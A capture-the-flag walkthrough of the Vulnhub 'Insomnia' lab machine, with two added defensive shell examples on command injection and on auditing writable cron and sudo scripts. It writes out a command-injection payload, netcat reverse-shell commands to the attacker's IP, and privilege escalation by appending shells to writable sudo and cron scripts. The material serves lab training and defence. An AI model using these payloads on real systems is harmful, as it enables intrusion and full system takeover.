Insomnia Walkthrough – Vulnhub – Writeup

Insomnia is an easy machine from Vulnhub by alienum. We have to understand LFI, RCE, sudo abuse and cron job abuse to get root on the machine. Here, I will be doing the full method, i.e. getting the user flag first and then the root flag. However, once you get the foothold, you can go directly for root access, but this is not the path intended by the author.

Link to the machine: https://www.vulnhub.com/entry/insomnia-1,644/

Walkthrough of the Orasi machine by the same author

Identify the target

We have to identify the IP address of the target first.

fping -aqg 10.0.2.0/24
I got my IP address as 10.0.2.15 and that of the target as 10.0.2.114.

Scan the open ports

Next, we have to scan the open ports on the target so that we get the services that we can interact with.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.114
There is only one port open. So, we might have to go deep rather than wide, which is easier in my view.

Enumerate the web server

The default page has a simple chat interface that works one way only.

When we do a directory scan, we get new paths.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .html,.php,.txt -u http://10.0.2.114:8080/FUZZ -of html -o dir.html -fs 2899
The chat.txt path stored the chat messages.

However, the administration.php file had something interesting.

We can see from the screenshot above that it might be expecting something after the colon. Then, I checked the chat page.

Here, we can see a line in the chatbox. So, we can guess that the file was expecting something. Therefore, I tried fuzzing the GET parameter.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://10.0.2.114:8080/administration.php?FUZZ=anything' -of html -o admin-get.html -fs 65
Luckily, we got a GET parameter, logfile, that also allowed file inclusion and code execution.

Well, it’s not file inclusion, but it performed some operation based on the supplied file name. Thus, let’s try a different payload.

?logfile=chat.txt;whoami
This gave the execution of the command whose results we can see on the chatbox. Hence, we can try spawning a reverse shell on port 9001.
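The reason a `;` in the logfile value runs a second command is that the parameter ends up inside a command string that a shell parses. The page does not show the PHP behind administration.php, so the following is an added example (not the machine's code or the author's): a constructed shell model of the weak pattern next to a hardened version that allowlists the file name and never lets the shell re-parse it. The `read_log_unsafe`/`read_log_safe` names and the `chat.txt` fixture are assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not from the original writeup. Models how a "logfile"
# request parameter can become a shell command, and how to stop it.

# VULNERABLE: the value is spliced into a command string, so the shell
# treats ';' in it as a command separator (what "?logfile=chat.txt;whoami"
# relies on in the writeup).
read_log_unsafe() {
    logfile=$1
    sh -c "cat $logfile" 2>/dev/null
}

# HARDENED: accept only a plain file name made of letters, digits, '.', '_'
# and '-', refuse dotfiles (covers "." and ".."), and pass the name as a
# single argument after '--' so it is never parsed as shell syntax.
read_log_safe() {
    case $1 in
        ''|*[!A-Za-z0-9._-]*) echo "rejected: $1" >&2; return 1 ;;
        .*)                   echo "rejected: $1" >&2; return 1 ;;
    esac
    cat -- "$1"
}

# Constructed fixture: a fake chat log in a private temp directory.
demo_dir=$(mktemp -d)
printf 'hello from chat\n' > "$demo_dir/chat.txt"

# The same injected value against each variant (run inside the fixture dir
# in a subshell so the caller's working directory is untouched).
demo_unsafe()  { (cd "$demo_dir" && read_log_unsafe 'chat.txt; echo INJECTED'); }
demo_safe()    { (cd "$demo_dir" && read_log_safe   'chat.txt; echo INJECTED'); }
demo_safe_ok() { (cd "$demo_dir" && read_log_safe   'chat.txt'); }
```

`demo_unsafe` prints the log and then INJECTED, because `sh -c` saw two commands; `demo_safe` rejects the value with a non-zero status before touching the filesystem, while `demo_safe_ok` still serves a legitimate name. On a real server the same rule applies whatever the language: validate against an allowlist and pass file names as arguments, not as part of a command string.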

# on local machine
nc -nlvp 9001

Let’s check if the target has netcat available.

?logfile=;which nc
Since it has netcat, we can connect to our port.

?logfile=;nc -e /bin/bash 10.0.2.15 9001
Finally, we got the foothold.

Upgrade to an intelligent reverse shell

Get a user’s access

Next, I checked the sudo permissions of the user www-data.

sudo -l
From the screenshot above, we can see that the user can execute a script as the user julia without a password. So, I checked the permissions on the file.

cd /var/www/html
ls -al
It allowed users other than the owner root to write to it. Therefore, I appended /bin/bash to the end of the script.

echo '/bin/bash' >> start.sh
So, now, if we execute the script as the user julia, we will also be executing bash as the same user.

sudo -u julia bash /var/www/html/start.sh
Finally, I got the user’s flag.

cd
ls -al
cat user.txt
Root privilege escalation

When I looked at the crontab, I found a script being run every minute.

cat /etc/crontab
Then, we can check the permissions of the script, as we did for the previous one.

ls -l /var/cron/check.sh
It was also writable by other users. However, since this runs in the background, it’s better to spawn another reverse shell.
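Both escalations on this box (the sudo rule for start.sh and the cron entry for check.sh) come down to one misconfiguration: a script that runs with someone else's privileges but that other users can modify. The following is an added audit script, not part of the writeup, that finds that pattern: it pulls command paths out of crontab-format and sudoers-format lines and flags any that are group- or world-writable. The crontab, sudoers and script files it inspects are a constructed fixture built in a temp directory so the check runs anywhere; on a real host you would feed it /etc/crontab, /etc/cron.d/* and /etc/sudoers (or the output of sudo -l) instead.

```shell
#!/bin/sh
# Added example, not from the original writeup: find privileged scripts
# (cron jobs, NOPASSWD sudo commands) that non-owners can write to.

# Reads candidate paths on stdin, prints "WRITABLE <path>" when the group
# or other write bit is set. Paths that do not exist are skipped.
flag_writable_scripts() {
    while IFS= read -r path; do
        [ -f "$path" ] || continue
        mode=$(ls -ld "$path" | cut -c1-10)     # e.g. -rwxrwxrwx
        gw=$(printf '%s' "$mode" | cut -c6)      # group write column
        ow=$(printf '%s' "$mode" | cut -c9)      # other write column
        if [ "$gw" = w ] || [ "$ow" = w ]; then
            echo "WRITABLE $path"
        fi
    done
}

# System-crontab format: minute hour dom mon dow user command...
# Skip comments, blank lines and VAR=value lines; print the first absolute
# path found in the command field of each job.
crontab_script_paths() {
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$1" |
        awk '{ for (i = 7; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }'
}

# sudoers format, e.g.: www-data ALL=(julia) NOPASSWD: /bin/bash /path/start.sh
# Print every absolute path named after NOPASSWD: (comma-separated lists too).
sudoers_script_paths() {
    grep -E 'NOPASSWD:' "$1" | sed -E 's/.*NOPASSWD:[[:space:]]*//' |
        tr ',' '\n' | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }'
}

# Constructed fixture mirroring the writeup's layout: two scripts that are
# world-writable (the misconfiguration) and one that is not.
build_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/var/cron" "$d/var/www/html"
    printf '#!/bin/sh\necho check\n'  > "$d/var/cron/check.sh"
    printf '#!/bin/sh\necho start\n'  > "$d/var/www/html/start.sh"
    printf '#!/bin/sh\necho rotate\n' > "$d/var/cron/rotate.sh"
    chmod 777 "$d/var/cron/check.sh"
    chmod 777 "$d/var/www/html/start.sh"
    chmod 755 "$d/var/cron/rotate.sh"       # owner-only write: fine
    cat > "$d/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/bin:/bin
# m h dom mon dow user command
* * * * * root $d/var/cron/check.sh
*/5 * * * * root $d/var/cron/rotate.sh
EOF
    cat > "$d/sudoers" <<EOF
www-data ALL=(julia) NOPASSWD: /bin/bash $d/var/www/html/start.sh
EOF
    echo "$d"
}

# Runs both extractors over the fixture and returns the findings.
audit_fixture() {
    d=$(build_fixture)
    { crontab_script_paths "$d/crontab"; sudoers_script_paths "$d/sudoers"; } |
        flag_writable_scripts
}

audit_fixture
```

The expected findings are the two 777 scripts, check.sh and start.sh; rotate.sh (mode 755) and /bin/bash are not reported. The fix for a real finding is the mirror image of the writeup's attack: make the script root-owned with mode 755 or stricter, and check that its parent directories are not writable either, since a writable directory lets the file be replaced outright.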

nc -nlvp 9002

So, I added the code to spawn a reverse shell on the script.

echo 'nc -e /bin/bash 10.0.2.15 9002' >> /var/cron/check.sh
After some time, I got the reverse shell. Finally, I got the root flag.

cd
ls -al
cat root.txt